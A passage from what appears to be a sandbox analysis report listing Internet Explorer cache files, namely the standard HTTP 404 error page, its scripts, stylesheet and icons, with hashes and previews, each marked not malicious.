                                                                                                                                                                SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\info_48[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4113
                                                                                                                                                                Entropy (8bit):7.9370830126943375
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                                                                                                                                                MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                                                SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                                                SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                                                SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\background_gradient[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):453
                                                                                                                                                                Entropy (8bit):5.019973044227213
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                                                                                                                                                MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                                                SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                                                SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                                                SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\bullet[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):447
                                                                                                                                                                Entropy (8bit):7.304718288205936
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                                                                                                                                                MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                                                SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                                                SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                                                SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/bullet.png
                                                                                                                                                                Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\down[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):748
                                                                                                                                                                Entropy (8bit):7.249606135668305
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\errorPageStrings[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4720
                                                                                                                                                                Entropy (8bit):5.164796203267696
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\httpErrorPagesScripts[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12105
                                                                                                                                                                Entropy (8bit):5.451485481468043
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\http_404[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):6495
                                                                                                                                                                Entropy (8bit):3.8998802417135856
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
                                                                                                                                                                MD5:F65C729DC2D457B7A1093813F1253192
                                                                                                                                                                SHA1:5006C9B50108CF582BE308411B157574E5A893FC
                                                                                                                                                                SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
                                                                                                                                                                SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/http_404.htm
                                                                                                                                                                Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\info_48[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4113
                                                                                                                                                                Entropy (8bit):7.9370830126943375
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                                                                                                                                                MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                                                SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                                                SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                                                SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\ErrorPageTemplate[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):2168
                                                                                                                                                                Entropy (8bit):5.207912016937144
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                                                MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                                                SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                                                SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                                                SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/ErrorPageTemplate.css
                                                                                                                                                                Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\background_gradient[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):453
                                                                                                                                                                Entropy (8bit):5.019973044227213
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                                                                                                                                                MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                                                SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                                                SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                                                SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\bullet[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):447
                                                                                                                                                                Entropy (8bit):7.304718288205936
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                                                                                                                                                MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                                                SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                                                SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                                                SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\down[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):748
                                                                                                                                                                Entropy (8bit):7.249606135668305
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/down.png
                                                                                                                                                                Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\httpErrorPagesScripts[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12105
                                                                                                                                                                Entropy (8bit):5.451485481468043
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\http_404[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):6495
                                                                                                                                                                Entropy (8bit):3.8998802417135856
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
                                                                                                                                                                MD5:F65C729DC2D457B7A1093813F1253192
                                                                                                                                                                SHA1:5006C9B50108CF582BE308411B157574E5A893FC
                                                                                                                                                                SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
                                                                                                                                                                SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\info_48[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4113
                                                                                                                                                                Entropy (8bit):7.9370830126943375
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                                                                                                                                                MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                                                SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                                                SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                                                SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                                                Malicious:false
